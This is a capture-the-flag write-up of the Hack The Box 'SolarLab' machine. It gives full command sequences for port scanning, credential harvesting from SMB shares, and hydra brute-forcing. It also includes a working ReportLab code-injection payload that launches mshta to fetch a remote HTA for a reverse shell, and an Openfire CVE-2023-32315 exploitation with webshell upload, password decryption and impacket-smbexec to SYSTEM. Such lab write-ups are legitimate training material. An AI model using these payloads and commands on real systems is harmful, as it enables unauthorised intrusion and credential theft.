Table of contents
Open Table of contents
INFO
CTF URL: https://app.hackthebox.com/machines/SolarLab
IP:10.10.11.16
Difficulty: Medium
Reconaisance
NMAP
nmap -p- -T4 10.10.11.16 -v
Discovered open port 139/tcp on 10.10.11.16
Discovered open port 80/tcp on 10.10.11.16
Discovered open port 445/tcp on 10.10.11.16
Discovered open port 135/tcp on 10.10.11.16
Discovered open port 6791/tcp on 10.10.11.16
nmap -p80,139,445,135,6791 -sS -sC -sV 10.10.11.16 -v
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.24.0
|_http-title: SolarLab Instant Messenger
| http-methods:
|_ Supported Methods: GET HEAD
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
6791/tcp open http nginx 1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: -48s
| smb2-time:
| date: 2024-07-16T10:35:08
|_ start_date: N/A
adding solarlab.htb and report.solarlab.htb to /etc/hosts
WEB
Users:
Alexander Knight
Claudia Springer
Blake Byte
It is some unhackable messenger’s home page.
SMB
└─$ smbclient \\\\10.10.11.16\\Documents -N
smb: \> ls
. DR 0 Fri Apr 26 10:47:14 2024
.. DR 0 Fri Apr 26 10:47:14 2024
concepts D 0 Fri Apr 26 10:41:57 2024
desktop.ini AHS 278 Fri Nov 17 05:54:43 2023
details-file.xlsx A 12793 Fri Nov 17 07:27:21 2023
My Music DHSrn 0 Thu Nov 16 14:36:51 2023
My Pictures DHSrn 0 Thu Nov 16 14:36:51 2023
My Videos DHSrn 0 Thu Nov 16 14:36:51 2023
old_leave_request_form.docx A 37194 Fri Nov 17 05:35:57 2023
Downloaded a lot of files. Interesting details:
Username Password
[email protected] al;ksdhfewoiuh
KAlexander dkjafblkjadsfgl
[email protected] d398sadsknr390
blake.byte ThisCanB3typedeasily1@
AlexanderK danenacia9234n
ClaudiaS dadsfawe9dafkn
correct usernames
ClaudiaS
AlexanderK
BlakeB
the last one is derived.
port 6791
http://report.solarlab.htb:6791/ - login form
login
pass.lst
al;ksdhfewoiuh
dkjafblkjadsfgl
d398sadsknr390
ThisCanB3typedeasily1@
danenacia9234n
dadsfawe9dafkn
hydra -L users.lst -P pass.lst report.solarlab.htb http-post-form "/login:username=^USER^&password=^PASS^:F=User authentication error." -s 6791 -v
# result
[6791][http-post-form] host: report.solarlab.htb login: BlakeB password: ThisCanB3typedeasily1@
PDF Generator
an access to a dashboard with pdf generators is given to us. Found the following: https://github.com/c53elyas/CVE-2023-33733/blob/master/code-injection-poc/poc.py so lets get reverse shell
# set lport and run
msf6 exploit(windows/misc/hta_server) >
[*] Started reverse TCP handler on 10.10.14.81:4321
[*] Using URL: http://10.10.14.81:8040/V5MeHBdBENTo0Xo.hta
[*] Server started.
# the folloing should be executed on windows
mshta http://10.10.14.81:8181/zCPZIvWLnfc.hta
Prepare the payload
<para>
<font color="[ [ getattr(pow,Word('__globals__'))['os'].system('mshta http://10.10.14.81:8181/zCPZIvWLnfc.hta') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
exploit
</font>
</para>
Catch the request and alter the input field (that does not require char limit)
meterpreter > getuid
Server username: SOLARLAB\blake
meterpreter > cat Desktop\\user.txt
283ba41090a704847ce1b8ed038df860
Enumeration
meterpreter > ls
Listing: c:\Users\blake\Documents\app
=====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 4096 dir 2024-07-16 11:02:37 -0400 __pycache__
100666/rw-rw-rw- 1278 fil 2023-11-17 02:59:44 -0500 app.py
040777/rwxrwxrwx 0 dir 2024-05-02 05:30:27 -0400 instance
100666/rw-rw-rw- 315 fil 2023-11-16 07:17:58 -0500 models.py
040777/rwxrwxrwx 0 dir 2024-07-16 10:43:17 -0400 reports
100666/rw-rw-rw- 7790 fil 2023-11-18 11:59:40 -0500 routes.py
040777/rwxrwxrwx 0 dir 2023-11-17 03:01:10 -0500 static
040777/rwxrwxrwx 4096 dir 2023-11-17 03:01:10 -0500 templates
100666/rw-rw-rw- 3352 fil 2024-05-02 11:26:05 -0400 utils.py
cat instance\\users.db
�!!��+�9tableuseruserCREATE TABLE user (
id INTEGER NOT NULL,
username VARCHAR(50) NOT NULL,
password VARCHAR(100) NOT NULL,
PRIMARY KEY (id),
UNIQUE (username)
����!)alexanderkHotP!fireguard'claudias007poiuytrewq 9blakebThisCanB3typedeasily1@
����!alexanderk
claudias blakeb
alexanderk - HotP!fireguard'
claudias - 007poiuytrewq
blakeb - ThisCanB3typedeasily1@
Not that interesting.
meterpreter > shell
Process 1836 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.4355]
(c) Microsoft Corporation. All rights reserved.
c:\Users>net users
net users
User accounts for \\SOLARLAB
-------------------------------------------------------------------------------
Administrator blake DefaultAccount
Guest openfire WDAGUtilityAccount
The command completed successfully.
some openfire user and program called the same
Listing: c:\Program Files
=========================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
...
040777/rwxrwxrwx 4096 dir 2023-11-17 07:22:02 -0500 Openfire
...
PrivEsc with openfire
Openfire is an instant messaging app. Lets hack it.
meterpreter > netstat
Connection list
===============
Proto Local address Remote address State User Inode
----- ------------- -------------- ----- ---- ----- --------
...
tcp 127.0.0.1:9090 0.0.0.0:* LISTEN 0 0 3228/openfire-service.exe
tcp 127.0.0.1:9091 0.0.0.0:* LISTEN 0 0 3228/openfire-service.exe
...
first, lets forward port to local
#meterpreter>
portfwd add -l 9090 -p 9090 -r 127.0.0.1
or https://github.com/jpillora/chisel/releases
# on kali
./chisel_1.9.1_linux_amd64 server --socks5 --reverse -p 3333
# on wind
.\chisel_1.9.1_windows_386 client 10.10.14.81:3333 R:90:127.0.0.1:9090
The version: Openfire, Version: 4.7.4
Next I found an exploit: https://github.com/miko550/CVE-2023-32315
python3 CVE-2023-32315.py -t http://127.0.0.1:9090
...
User added successfully: url: http://127.0.0.1:9090 username: 14t2rv password: 7952pc
1. Run exploit
2. login with newly added user
3. goto tab plugin > upload plugin `openfire-management-tool-plugin.jar`
4. goto tab server > server settings > Management tool
5. Access websehll with password "123"
6. **chose option system command
Next we can get reverse shell (again with hta)
use exploit/windows/misc/hta_server
mshta http://10.10.14.81:8282/Hd0dKyP4sA.hta
PrivEsc to root
in C:\Program Files\Openfire\embedded-db\openfire.log
...
INSERT INTO OFPROPERTY VALUES('admin.authorizedJIDs','[email protected],[email protected],[email protected]',0,NULL)
...
in ......openfire.script
...
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','[email protected]','001700223740785','0')
...
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
The password is encrypted.
java OpenFireDecryptPass.java becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn
ThisPasswordShouldDo!@ (hex: 005400680069007300500061007300730077006F0072006400530068006F0075006C00640044006F00210040)
ThisPasswordShouldDo!@
Lets try connect via smb:
impacket-smbexec administrator:'ThisPasswordShouldDo!@'@solarlab.htb
Impacket v0.11.0 - Copyright 2023 Fortra
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>
C:\Windows\system32>whoami
nt authority\system
Finally, I again got the meterpreter shell and moved to Administrator’s Desktop
meterpreter > cat root.txt
bd73ecb598620827a239ce0c9643c956